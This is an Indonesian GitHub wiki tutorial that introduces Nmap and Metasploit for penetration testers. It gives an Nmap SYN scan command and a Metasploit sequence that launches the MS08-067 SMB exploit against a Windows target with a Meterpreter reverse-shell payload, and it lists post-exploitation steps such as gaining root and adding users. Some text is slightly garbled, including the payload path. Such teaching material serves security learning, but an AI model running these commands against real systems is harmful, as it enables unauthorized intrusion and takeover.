Tools NMAP dan Metasploit - Rian010/Journal GitHub Wiki
NMAP dan Metasploit adalah dua tools yang sering digunakan oleh penetester dalam melakukan penetrasi ke sistem target.
NMAP adalah tools yang digunakan untuk mengidentifikasi host dan jaringan, serta melakukan scanning port dan service yang tersedia pada sistem target. Beberapa fitur yang tersedia pada NMAP antara lain:
- Scanning port dan service yang tersedia pada sistem target
- Mendeteksi os dan jenis service yang digunakan oleh sistem target
- Mendeteksi firewall dan filtering rule yang digunakan oleh sistem target
- Mendeteksi vulnerabilitas pada sistem target
Contoh penggunaan NMAP:
nmap -sS <target>
Dalam contoh di atas, -sS digunakan untuk melakukan scanning SYN, dimana NMAP akan mengirim permintaan SYN ke port-port yang ditargetkan. digunakan untuk menentukan target yang akan discan.
Metasploit adalah framework yang digunakan untuk melakukan ekploitasi terhadap sistem target. Beberapa fitur yang tersedia pada Metasploit antara lain:
- Mempersiapkan lingkungan penetrasi
- Mencari vulnerabilitas pada sistem target
- Membuat payload dan melakukan injecting ke sistem target
- Melakukan post exploitation, seperti mendapatkan akses root atau menambahkan user baru
Contoh penggunaan Metasploit:
use exploit/windows/smb/ms08_067_netapi
set RHOST <target>
set PAYLOAD windows/ Meterpreter/reverse_tcp
exploitDalam contoh di atas, use digunakan untuk memilih exploit yang akan digunakan. set digunakan untuk menentukan variabel-variabel yang dibutuhkan oleh exploit, seperti RHOST dan PAYLOAD. exploit digunakan untuk melakukan exploit terhadap sistem target.
Demikian beberapa penjelasan mengenai NMAP dan Metasploit. Selamat mencoba!
